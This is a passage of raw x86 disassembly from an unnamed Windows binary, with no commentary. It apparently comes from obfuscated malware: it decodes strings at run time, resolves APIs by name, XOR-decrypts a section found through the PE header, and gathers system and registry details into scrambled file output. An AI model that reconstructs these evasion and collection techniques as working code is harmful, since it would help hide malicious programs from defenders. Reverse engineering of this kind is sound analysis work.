mov [ebp+var_2CC], eax
mov ebx, eax
mov ds:10010388h[ebx], edi
mov eax, ds:100131D4h
sub eax, 2
push eax
push 58h
push 0CCh
mov eax, 30h
mul esi
mov [ebp+var_2D0], eax
push dword ptr ds:10010388h[eax]
call dword ptr ds:1000D014h
push 10013F44h
call sub_41C914
mov [ebp+var_2D4], eax
push 10013F22h
call sub_41C914
mov [ebp+var_2D8], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2DC], eax
mov edi, eax
push dword ptr ds:1001037Ch[edi]
movsx edi, word ptr ds:1001327Ch
add edi, 3Ch
push edi
push [ebp+var_120]
movsx edi, word ptr ds:10013100h
add edi, 4Ch
push edi
movsx edi, word ptr ds:100130C0h
add edi, 94h
push edi
push 50000000h
mov edi, [ebp+var_2D8]
push edi
mov edi, [ebp+var_2D4]
push edi
movsx edi, word ptr ds:100131E0h
movsx ebx, word ptr ds:10013174h
add edi, ebx
sub edi, 0Ah
push edi
call dword ptr ds:1001164Ch
mov [ebp+var_25C], eax
push 1
push [ebp+var_130]
push 30h
push eax
call dword ptr ds:1000D014h
push 10013F18h
call sub_41C914
mov [ebp+var_2E0], eax
push 10013EFEh
call sub_41C914
add esp, 18h
mov [ebp+var_2E4], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2E8], eax
mov edi, eax
push dword ptr ds:1001037Ch[edi]
movsx edi, word ptr ds:10013150h
mov ebx, ds:10013288h
lea edi, [edi+ebx+9]
push edi
mov edi, ds:100131E4h
add edi, 97h
push edi
mov edi, ds:100131B0h
add edi, 0F1h
add edi, ds:10013278h
mov ebx, ds:10013198h
add ebx, 1Eh
movsx edx, word ptr ds:100131E0h
add ebx, edx
sub edi, ebx
push edi
movsx edi, word ptr ds:100130D0h
add edi, 3
push edi
push 50800000h
mov edi, [ebp+var_2E4]
push edi
mov edi, [ebp+var_2E0]
push edi
mov edi, ds:1001317Ch
sub edi, 5
push edi
call dword ptr ds:1001164Ch
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2EC], eax
mov ebx, eax
mov ds:1001038Ch[ebx], edi
push 1
push [ebp+var_130]
mov eax, 30h
push 30h
mul esi
mov [ebp+var_2F0], eax
push dword ptr ds:1001038Ch[eax]
call dword ptr ds:1000D014h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2F4], eax
mov [ebp+var_2F8], eax
push dword ptr ds:10010380h[eax]
call dword ptr ds:10012628h
mov edi, [ebp+var_2F8]
mov ds:10010390h[edi], eax
push 100089F6h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2FC], eax
push dword ptr ds:10010380h[eax]
call dword ptr ds:1000F5FCh
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_300], eax
mov [ebp+var_304], eax
push dword ptr ds:10010384h[eax]
call dword ptr ds:10012628h
mov edi, [ebp+var_304]
mov ds:10010394h[edi], eax
push 100089F6h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_308], eax
push dword ptr ds:10010384h[eax]
call dword ptr ds:1000F5FCh
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_30C], eax
mov [ebp+var_310], eax
push dword ptr ds:10010388h[eax]
call dword ptr ds:10012628h
mov edi, [ebp+var_310]
mov ds:10010398h[edi], eax
push 100089F6h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_314], eax
push dword ptr ds:10010388h[eax]
call dword ptr ds:1000F5FCh
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_318], eax
mov [ebp+var_31C], eax
push dword ptr ds:1001037Ch[eax]
call dword ptr ds:10012628h
mov edi, [ebp+var_31C]
mov ds:1001039Ch[edi], eax
push 100089F6h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_320], eax
push dword ptr ds:1001037Ch[eax]
call dword ptr ds:1000F5FCh
mov eax, 30h
mul esi
mov [ebp+var_324], eax
push dword ptr ds:10010380h[eax]
call dword ptr ds:1000FA40h
loc_41EFC7: ; CODE XREF: sub_41DF98+10�j
; sub_41DF98+21�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41DF98 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, ds:1001320Ch
add eax, ds:10013198h
sub eax, 8
cmp ds:10012784h, eax
jbe short loc_41EFF0
push 10012784h
call dword ptr ds:1000D010h
loc_41EFF0: ; CODE XREF: .data:0041EFE3�j
mov eax, ds:10012784h
pop ebp
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
mov eax, [ebp+0Ch]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call dword ptr ds:1000F618h
pop edi
pop ebp
retn 10h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 15Ch
push ebx
push esi
push edi
call sub_41A1EB
call sub_41B8C0
call sub_41B7D9
call sub_4198EA
call sub_421158
call sub_419AAB
call sub_41C67B
call sub_41C5D3
call sub_419BB0
mov esi, eax
loc_41F052: ; CODE XREF: .data:0041F0AE�j
call sub_419B03
mov edx, eax
mov [ebp-144h], dl
movzx eax, byte ptr [ebp-144h]
mov edx, ds:100130A0h
sub edx, 2
cmp eax, edx
jnz short loc_41F08A
movsx eax, word ptr ds:100131DCh
add eax, ds:10013194h
sub eax, 9
push eax
call dword ptr ds:10012664h
loc_41F08A: ; CODE XREF: .data:0041F071�j
movzx eax, byte ptr [ebp-144h]
mov edx, ds:100131F8h
sub edx, 2
cmp eax, edx
jnz short loc_41F0B0
mov eax, ds:10013228h
add eax, 61h
push eax
call dword ptr ds:10012630h
pop ecx
jmp short loc_41F052
; ---------------------------------------------------------------------------
loc_41F0B0: ; CODE XREF: .data:0041F09C�j
or esi, esi
jnz loc_41F16A
push 10013EF3h
call sub_41C914
mov [ebp-154h], eax
push 10013EE9h
call sub_41C914
push eax
mov edx, [ebp-154h]
push edx
lea edx, [ebp-143h]
push edx
call dword ptr ds:10012634h
lea eax, [ebp-143h]
push eax
push 0
push 0
call dword ptr ds:1001261Ch
mov ebx, eax
push 10013EDDh
call sub_41C914
mov [ebp-158h], eax
push 10013ED3h
call sub_41C914
mov edx, ds:10013234h
add edx, ds:1001323Ch
sub edx, 7
push edx
push eax
mov edx, [ebp-158h]
push edx
lea edx, [ebp-143h]
push edx
call dword ptr ds:10012634h
add esp, 2Ch
lea eax, [ebp-143h]
push eax
push 0
push 0
call dword ptr ds:1001261Ch
mov ebx, eax
or ebx, ebx
jnz short loc_41F16A
movsx eax, word ptr ds:100130CCh
add eax, ds:10013138h
sub eax, 6
push eax
call dword ptr ds:10012664h
loc_41F16A: ; CODE XREF: .data:0041F0B2�j
; .data:0041F151�j
push 0
call dword ptr ds:1000F5E8h
mov edi, eax
push 10013EC9h
call sub_41C914
mov [ebp-20h], eax
mov [ebp-34h], edi
lea eax, ds:10007BECh
mov [ebp-40h], eax
push 7F00h
push 0
call dword ptr ds:10010220h
mov [ebp-2Ch], eax
push 7F03h
push 0
call dword ptr ds:10012620h
mov [ebp-30h], eax
and dword ptr [ebp-24h], 0
push 0
call dword ptr ds:1000E120h
mov [ebp-28h], eax
mov dword ptr [ebp-44h], 3
mov eax, ds:100131C4h
add eax, ds:1001319Ch
sub eax, 0Bh
mov [ebp-3Ch], eax
mov eax, ds:10013108h
movsx edx, word ptr ds:100130FCh
add eax, edx
sub eax, 0Ch
mov [ebp-38h], eax
lea eax, [ebp-44h]
push eax
call dword ptr ds:1000F0DCh
push 10013EBFh
call sub_41C914
mov [ebp-15Ch], eax
push 10013EB5h
call sub_41C914
push 0
push edi
push 0
push 0
mov edx, ds:10013228h
add edx, ds:100131D8h
sub edx, 0Ch
push edx
movsx edx, word ptr ds:10013124h
sub edx, 6
push edx
mov edx, ds:10013214h
mov ecx, edx
sub ecx, 9
push ecx
movsx ecx, word ptr ds:100130E0h
dec ecx
push ecx
push 0CA0000h
push eax
mov ecx, [ebp-15Ch]
push ecx
mov ecx, ds:10013254h
add ecx, edx
mov edx, ecx
sub edx, 12h
push edx
call dword ptr ds:1001164Ch
mov ds:1000F610h, eax
lea eax, [ebp-148h]
push eax
push edi
call sub_41F52F
add esp, 14h
mov [ebp-14Ch], eax
mov ds:10012610h, eax
mov eax, [ebp-148h]
mov ds:1000F614h, eax
or esi, esi
jnz short loc_41F2AD
call sub_419F76
mov eax, ds:10013090h
add eax, ds:10013110h
sub eax, 8
mov ds:10012638h, eax
jmp short loc_41F2C6
; ---------------------------------------------------------------------------
loc_41F2AD: ; CODE XREF: .data:0041F291�j
movsx eax, word ptr ds:100130C0h
mov edx, ds:10013220h
lea eax, [eax+edx+3A92h]
mov ds:10012638h, eax
loc_41F2C6: ; CODE XREF: .data:0041F2AB�j
lea eax, [ebp-150h]
push eax
mov eax, ds:100131D8h
add eax, ds:100130DCh
sub eax, 0Ch
push eax
push 0
push 100029CBh
mov eax, ds:1001321Ch
add eax, ds:10013224h
sub eax, 0Dh
push eax
push 0
call dword ptr ds:10012B90h
push eax
call dword ptr ds:10011654h
or esi, esi
jnz short loc_41F325
call sub_419F88
call sub_41DABE
jmp short loc_41F325
; ---------------------------------------------------------------------------
loc_41F311: ; CODE XREF: .data:0041F347�j
lea eax, [ebp-1Ch]
push eax
call dword ptr ds:1001277Ch
lea eax, [ebp-1Ch]
push eax
call dword ptr ds:1000D050h
loc_41F325: ; CODE XREF: .data:0041F303�j
; .data:0041F30F�j
movsx eax, word ptr ds:10013174h
sub eax, 7
push eax
mov eax, ds:10013134h
sub eax, 8
push eax
push 0
lea eax, [ebp-1Ch]
push eax
call dword ptr ds:10011630h
or eax, eax
jnz short loc_41F311
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
dd 4001B8h, 8C280h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 10012784h
call dword ptr ds:1000FA3Ch
mov eax, ds:10012784h
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_41F36F proc near ; CODE XREF: .data:00420EA7�p
push edi
push 10013EA7h
call sub_41C914
pop ecx
push eax
call dword ptr ds:1000F5E8h
mov ds:10013298h, eax
test eax, eax
jnz short loc_41F3A2
push 10013E99h
call sub_41C914
pop ecx
push eax
call dword ptr ds:10010244h
mov ds:10013298h, eax
loc_41F3A2: ; CODE XREF: sub_41F36F+1A�j
push 10013E8Fh
call sub_41C914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:10012630h, eax
push 10013E84h
call sub_41C914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:1000D030h, eax
push 10013E7Ch
call sub_41C914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:1000D054h, eax
push 10013E74h
call sub_41C914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:1000FA38h, eax
push 10013E6Ah
call sub_41C914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:1000FA2Ch, eax
push 10013E60h
call sub_41C914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:1001264Ch, eax
push 10013E56h
call sub_41C914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:10011638h, eax
push 10013E4Ch
call sub_41C914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:10011644h, eax
push 10013E44h
call sub_41C914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:10012BACh, eax
push 10013E3Bh
call sub_41C914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:10012600h, eax
push 10013E31h
call sub_41C914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:1000D020h, eax
push 10013E26h
call sub_41C914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:10012634h, eax
push 10013E1Ah
call sub_41C914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:1001024Ch, eax
push 10013E10h
call sub_41C914
add esp, 38h
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:1000F1F4h, eax
pop edi
retn
sub_41F36F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F52F proc near ; CODE XREF: .data:0041F271�p
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov eax, [ebp+arg_0]
mov esi, [eax+3Ch]
mov ecx, esi
add ecx, eax
mov eax, [ecx+28h]
mov edx, [ebp+arg_0]
lea esi, [eax+edx+0Dh]
movzx eax, byte ptr [esi]
xor eax, 4Dh
mov [ebp+var_1], al
movzx eax, byte ptr [esi+1]
mov edx, ds:1001318Ch
add edx, 200h
mov ebx, eax
imul ebx, edx
mov eax, ds:100130ECh
mov ecx, eax
add ecx, ds:1001309Ch
sub ecx, 7
jmp short loc_41F587
; ---------------------------------------------------------------------------
loc_41F579: ; CODE XREF: sub_41F52F+5A�j
movzx eax, byte ptr [esi+ecx]
movzx edx, [ebp+var_1]
xor eax, edx
mov [esi+ecx], al
inc ecx
loc_41F587: ; CODE XREF: sub_41F52F+48�j
cmp ecx, ebx
jb short loc_41F579
mov eax, [ebp+arg_4]
mov [eax], ebx
mov eax, esi
pop esi
pop ebx
leave
retn
sub_41F52F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F596 proc near ; CODE XREF: sub_419F88+AB�p
var_1AC = dword ptr -1ACh
var_1A8 = byte ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_198 = dword ptr -198h
var_193 = dword ptr -193h
var_18F = dword ptr -18Fh
var_18B = dword ptr -18Bh
var_187 = dword ptr -187h
var_183 = dword ptr -183h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1ACh
push esi
push edi
mov edi, [ebp+arg_0]
mov byte ptr [edi], 0
mov [ebp+var_193], 94h
lea eax, [ebp+var_193]
push eax
call dword ptr ds:10012B98h
cmp [ebp+var_183], 1
jnz short loc_41F5DC
push 10013E0Ah
call sub_41C914
push eax
push edi
call dword ptr ds:1000D020h
add esp, 0Ch
loc_41F5DC: ; CODE XREF: sub_41F596+2F�j
cmp [ebp+var_183], 2
jnz short loc_41F5FA
push 10013E04h
call sub_41C914
push eax
push edi
call dword ptr ds:10012634h
add esp, 0Ch
loc_41F5FA: ; CODE XREF: sub_41F596+4D�j
push 10013DF8h
call sub_41C914
push [ebp+var_187]
push [ebp+var_18B]
push [ebp+var_18F]
push eax
lea esi, [ebp+var_FF]
push esi
call dword ptr ds:10012634h
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:1000D020h
push 10013DF1h
call sub_41C914
mov esi, ds:10013244h
sub esi, 4
push esi
push 0
lea esi, [ebp+var_19C]
push esi
lea esi, [ebp+var_19C]
push esi
lea esi, [ebp+var_198]
push esi
push 0FFh
lea esi, [ebp+var_FF]
push esi
push eax
call dword ptr ds:10012614h
push 10013DE9h
call sub_41C914
push [ebp+var_198]
push eax
lea esi, [ebp+var_FF]
push esi
call dword ptr ds:10012634h
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:1000D020h
push 0FFh
lea eax, [ebp+var_FF]
push eax
movsx eax, word ptr ds:1001324Ch
movsx edx, word ptr ds:100131E0h
add eax, edx
sub eax, 9
push eax
push 400h
call dword ptr ds:1000F5F8h
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:1000D020h
push 10013DE4h
call sub_41C914
push eax
push edi
call dword ptr ds:1000D020h
mov [ebp+var_1A0], 0FFh
push 10013DB7h
call sub_41C914
mov [ebp+var_1AC], eax
push 10013DAAh
call sub_41C914
lea esi, [ebp+var_1A8]
push esi
lea esi, [ebp+var_1A0]
push esi
lea esi, [ebp+var_FF]
push esi
push eax
mov esi, [ebp+var_1AC]
push esi
push 80000002h
call sub_41C7DB
add esp, 70h
mov [ebp+var_1A4], eax
mov eax, ds:1001315Ch
sub eax, 8
cmp [ebp+var_1A4], eax
jnz short loc_41F75C
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:1000D020h
add esp, 8
loc_41F75C: ; CODE XREF: sub_41F596+1B3�j
pop edi
pop esi
leave
retn
sub_41F596 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F760 proc near ; CODE XREF: sub_419F88+C7�p
; sub_41B354+3D1�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, ds:100131D4h
sub esi, 2
jmp short loc_41F7A8
; ---------------------------------------------------------------------------
loc_41F774: ; CODE XREF: sub_41F760+4B�j
call dword ptr ds:10012BACh
movsx edi, word ptr ds:1001322Ch
mov edx, ds:10013214h
lea edi, [edi+edx+51h]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
add edi, eax
mov edx, edi
mov [ebx+esi], dl
inc esi
loc_41F7A8: ; CODE XREF: sub_41F760+12�j
cmp esi, [ebp+arg_4]
jl short loc_41F774
mov eax, [ebp+arg_4]
mov edx, ds:10013190h
sub edx, 2
mov [ebx+eax], dl
mov eax, ebx
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41F760 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 118h
push ebx
push esi
push edi
movsx eax, word ptr ds:100131F0h
sub eax, 3
mov edx, [ebp+8]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_41F7F5
push 1000F0F0h
lea eax, [ebp-110h]
push eax
call sub_423399
jmp short loc_41F806
; ---------------------------------------------------------------------------
loc_41F7F5: ; CODE XREF: .data:0041F7E0�j
push 10010260h
lea eax, [ebp-110h]
push eax
call sub_423399
loc_41F806: ; CODE XREF: .data:0041F7F3�j
push 0
movsx eax, word ptr ds:10013160h
dec eax
push eax
push 4
push 0
mov eax, ds:1001318Ch
movsx edx, word ptr ds:10013240h
add eax, edx
sub eax, 2
push eax
push 40000000h
lea eax, [ebp-110h]
push eax
call dword ptr ds:10012788h
mov [ebp-8], eax
push 2
push 0
mov eax, ds:100131A0h
add eax, ds:10013210h
sub eax, 4
push eax
push dword ptr [ebp-8]
call dword ptr ds:10012B9Ch
push 10013DA2h
call sub_41C914
pop ecx
push 0
lea edx, [ebp-0Ch]
push edx
movsx edx, word ptr ds:100130B0h
movsx ecx, word ptr ds:100131B4h
add edx, ecx
sub edx, 7
push edx
push eax
push dword ptr [ebp-8]
call dword ptr ds:10012B8Ch
push 493E0h
push 40h
call dword ptr ds:1000FA34h
mov ebx, eax
push 61A80h
push 40h
call dword ptr ds:1000FA34h
mov esi, eax
mov eax, ds:100131BCh
sub eax, 9
mov edx, [ebp+8]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_41F8C3
mov eax, [ebp+8]
inc eax
push eax
push ebx
call sub_423399
jmp short loc_41F8CC
; ---------------------------------------------------------------------------
loc_41F8C3: ; CODE XREF: .data:0041F8B4�j
push dword ptr [ebp+8]
push ebx
call sub_423399
loc_41F8CC: ; CODE XREF: .data:0041F8C1�j
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_41F8D1: ; CODE XREF: .data:0041F8D6�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41F8D1
mov [ebp-4], eax
mov edi, ds:1001328Ch
sub edi, 6
jmp short loc_41F90C
; ---------------------------------------------------------------------------
loc_41F8E6: ; CODE XREF: .data:0041F90F�j
movzx eax, byte ptr [ebx+edi]
mov [ebp-114h], eax
mov eax, edi
mul edi
mov [ebp-118h], eax
mov eax, [ebp-114h]
mov edx, [ebp-118h]
add eax, edx
mov [ebx+edi], al
inc edi
loc_41F90C: ; CODE XREF: .data:0041F8E4�j
cmp edi, [ebp-4]
jb short loc_41F8E6
mov eax, ds:100130C4h
add eax, 61A79h
push eax
push esi
push dword ptr [ebp-4]
push ebx
call sub_41B22D
add esp, 10h
movsx eax, word ptr ds:10013260h
mov edi, eax
add edi, ds:10013224h
sub edi, 7
jmp short loc_41F952
; ---------------------------------------------------------------------------
loc_41F93D: ; CODE XREF: .data:0041F960�j
cmp byte ptr [esi+edi], 2Bh
jnz short loc_41F947
mov byte ptr [esi+edi], 28h
loc_41F947: ; CODE XREF: .data:0041F941�j
cmp byte ptr [esi+edi], 3Dh
jnz short loc_41F951
mov byte ptr [esi+edi], 29h
loc_41F951: ; CODE XREF: .data:0041F94B�j
inc edi
loc_41F952: ; CODE XREF: .data:0041F93B�j
mov ecx, esi
or eax, 0FFFFFFFFh
loc_41F957: ; CODE XREF: .data:0041F95C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41F957
cmp edi, eax
jb short loc_41F93D
mov eax, ds:1001312Ch
sub eax, 8
mov edx, [ebp+8]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_41F9A3
push 10013D9Dh
call sub_41C914
add esp, 4
push 0
lea edi, [ebp-0Ch]
push edi
mov edi, ds:10013244h
movsx edx, word ptr ds:100130B0h
add edi, edx
sub edi, 0Ah
push edi
push eax
push dword ptr [ebp-8]
call dword ptr ds:10012B8Ch
loc_41F9A3: ; CODE XREF: .data:0041F971�j
mov ecx, esi
or eax, 0FFFFFFFFh
loc_41F9A8: ; CODE XREF: .data:0041F9AD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41F9A8
push 0
lea edx, [ebp-0Ch]
push edx
mov edx, ds:10013110h
add edx, ds:10013238h
sub edx, 4
mov edi, eax
add edi, edx
push edi
push esi
push dword ptr [ebp-8]
call dword ptr ds:10012B8Ch
push dword ptr [ebp-8]
call dword ptr ds:10011654h
push ebx
call dword ptr ds:1000F61Ch
push esi
call dword ptr ds:1000F61Ch
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F9EF proc near ; CODE XREF: sub_419F76+2�p
; sub_419F76+9�p
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push edi
lea eax, [ebp+var_104]
push eax
mov eax, ds:100131D0h
sub eax, 7
push eax
push 0
push [ebp+arg_0]
push 0
call dword ptr ds:1000FA44h
mov edi, eax
or edi, edi
jnz short loc_41FA47
push 10013D98h
call sub_41C914
push eax
lea edi, [ebp+var_104]
push edi
call dword ptr ds:1000D020h
push 1
push 43h
lea eax, [ebp+var_104]
push eax
call sub_41D764
add esp, 18h
loc_41FA47: ; CODE XREF: sub_41F9EF+2B�j
pop edi
leave
retn
sub_41F9EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FA4A proc near ; CODE XREF: .data:00419D60�p
; sub_41DABE+17A�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov eax, ds:1001326Ch
movsx edx, word ptr ds:10013118h
mov esi, eax
add esi, edx
sub esi, 0Ch
lea eax, [ebp+var_4]
push eax
push 10014A38h
mov eax, [ebp+arg_0]
push eax
mov ebx, [eax]
call dword ptr ds:0[ebx]
mov edi, eax
mov eax, ds:100131D4h
sub eax, 2
cmp edi, eax
jz short loc_41FA8D
xor eax, eax
jmp short loc_41FAEB
; ---------------------------------------------------------------------------
loc_41FA8D: ; CODE XREF: sub_41FA4A+3D�j
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8]
mov eax, [ebp+var_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+10h]
mov edi, eax
mov eax, ds:100130B8h
sub eax, 3
cmp edi, eax
jnz short loc_41FAE0
push [ebp+arg_C]
push [ebp+arg_4]
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+14h]
mov edi, eax
mov eax, ds:100131CCh
add eax, ds:10013284h
sub eax, 0Fh
cmp edi, eax
jnz short loc_41FAD7
mov esi, ds:10013244h
sub esi, 3
loc_41FAD7: ; CODE XREF: sub_41FA4A+82�j
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_41FAE0: ; CODE XREF: sub_41FA4A+5F�j
mov eax, [ebp+var_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, esi
loc_41FAEB: ; CODE XREF: sub_41FA4A+41�j
pop edi
pop esi
pop ebx
leave
retn
sub_41FA4A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FAF0 proc near ; CODE XREF: sub_41DF98+463�p
; sub_41DF98+47F�p
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_423379
push ebx
push esi
push edi
push 5
push [ebp+arg_0]
call dword ptr ds:1000D004h
mov edi, eax
loc_41FB0D: ; CODE XREF: sub_41FAF0+7D�j
or edi, edi
jnz short loc_41FB15
xor eax, eax
jmp short loc_41FB6F
; ---------------------------------------------------------------------------
loc_41FB15: ; CODE XREF: sub_41FAF0+1F�j
push 0FFFh
lea eax, [ebp+var_FFF]
push eax
push edi
call dword ptr ds:1000E010h
movsx eax, word ptr ds:10013144h
sub eax, 5
push eax
push [ebp+arg_4]
lea eax, [ebp+var_FFF]
push eax
call sub_4188C2
add esp, 0Ch
movsx esi, word ptr ds:10013124h
movsx ebx, word ptr ds:10013170h
lea esi, [esi+ebx+0FFF7h]
cmp eax, esi
jz short loc_41FB62
mov eax, edi
jmp short loc_41FB6F
; ---------------------------------------------------------------------------
loc_41FB62: ; CODE XREF: sub_41FAF0+6C�j
push 2
push edi
call dword ptr ds:1000D004h
mov edi, eax
jmp short loc_41FB0D
; ---------------------------------------------------------------------------
loc_41FB6F: ; CODE XREF: sub_41FAF0+23�j
; sub_41FAF0+70�j
pop edi
pop esi
pop ebx
leave
retn
sub_41FAF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FB74 proc near ; CODE XREF: sub_418999+209�p
; sub_418999+220�p ...
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp dword ptr ds:10013290h, 0
jnz short loc_41FB9C
push 10012BC0h
call dword ptr ds:1000E008h
mov dword ptr ds:10013290h, 1
loc_41FB9C: ; CODE XREF: sub_41FB74+11�j
mov esi, ds:100131D8h
sub esi, 3
movzx ebx, byte ptr [edi]
movzx edx, byte ptr [edi+2]
movzx edx, dx
shl edx, 8
or ebx, edx
movzx ebx, bx
movsx edx, word ptr ds:100130BCh
sub edx, 7
imul ebx, edx
add esi, ebx
mov [ebp+var_4], si
movzx eax, [ebp+var_4]
mov edx, ds:100130ACh
add edx, 5
cmp eax, edx
jz loc_41FC5F
push 10012BC0h
call dword ptr ds:10012660h
mov eax, ds:10013110h
inc eax
mov [ebp+var_2], ax
jmp short loc_41FC1A
; ---------------------------------------------------------------------------
loc_41FBF6: ; CODE XREF: sub_41FB74+B0�j
movzx eax, [ebp+var_2]
add eax, edi
movsx edx, byte ptr [eax]
movsx ecx, byte ptr [edi+4]
xor edx, ecx
mov [eax], dl
movzx eax, [ebp+var_2]
mov edx, ds:1001309Ch
sub edx, 3
add eax, edx
mov [ebp+var_2], ax
loc_41FC1A: ; CODE XREF: sub_41FB74+80�j
movzx eax, [ebp+var_2]
movzx edx, [ebp+var_4]
cmp eax, edx
jl short loc_41FBF6
mov eax, ds:100131F8h
sub eax, 3
mov edx, ds:10013258h
sub edx, 2
mov [edi+eax], dl
mov eax, ds:1001321Ch
add eax, ds:10013114h
sub eax, 0Eh
mov edx, ds:10013128h
sub edx, 9
mov [edi+eax], dl
push 10012BC0h
call dword ptr ds:10011650h
loc_41FC5F: ; CODE XREF: sub_41FB74+65�j
lea eax, [edi+6]
pop edi
pop esi
pop ebx
leave
retn
sub_41FB74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FC67 proc near ; CODE XREF: sub_41BD8F+24�p
; sub_41DCEB+25�p ...
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push edi
mov edi, [ebp+arg_0]
push 104h
lea eax, [ebp+var_108]
push eax
call dword ptr ds:1000F600h
mov eax, ds:1001314Ch
movsx edx, word ptr ds:10013264h
sub edx, 9
mov byte ptr [ebp+eax+var_10C+1], dl
push 104h
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_10C]
push eax
push 104h
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_108]
push eax
call dword ptr ds:10012614h
push 10013D90h
call sub_41C914
push [ebp+var_10C]
push eax
push edi
call dword ptr ds:10012634h
add esp, 10h
mov eax, ds:100131D0h
add eax, ds:10013184h
sub eax, 9
mov [ebp+var_4], eax
jmp short loc_41FD2D
; ---------------------------------------------------------------------------
loc_41FCFE: ; CODE XREF: sub_41FC67+D3�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, 30h
jl short loc_41FD14
cmp al, 39h
jg short loc_41FD14
mov eax, [ebp+var_4]
add eax, edi
